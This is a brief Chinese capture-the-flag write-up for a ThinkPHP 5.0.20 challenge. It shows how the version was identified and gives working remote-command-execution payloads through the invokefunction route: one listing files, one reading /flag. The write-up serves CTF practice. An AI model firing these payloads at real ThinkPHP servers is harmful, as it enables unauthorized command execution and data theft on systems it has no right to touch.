工具
火狐
1.打开链接,观察到这是一个Think PHP V5 框架
2.尝试输入index.php,发现页面没有变化,继续输入下一级文件(随便输入),发现爆出了版本5.0.20
3.查询相关版本的漏洞(百度或者github)都可以试试 、
查询到的payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
放进去尝试发现可以利用
ls是系统命令,我们只需要将系统命令修改为打开flag文件就行
构造payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
4. 查询成功,找到flag。
相关大佬资源:
攻防世界web高手进阶php_rce,攻防世界 web高手进阶区 1-5 2020.6.11_榛子在发光的博客-CSDN博客
php命令执行漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析_AI众智新媒体一阿荣的博客-CSDN博客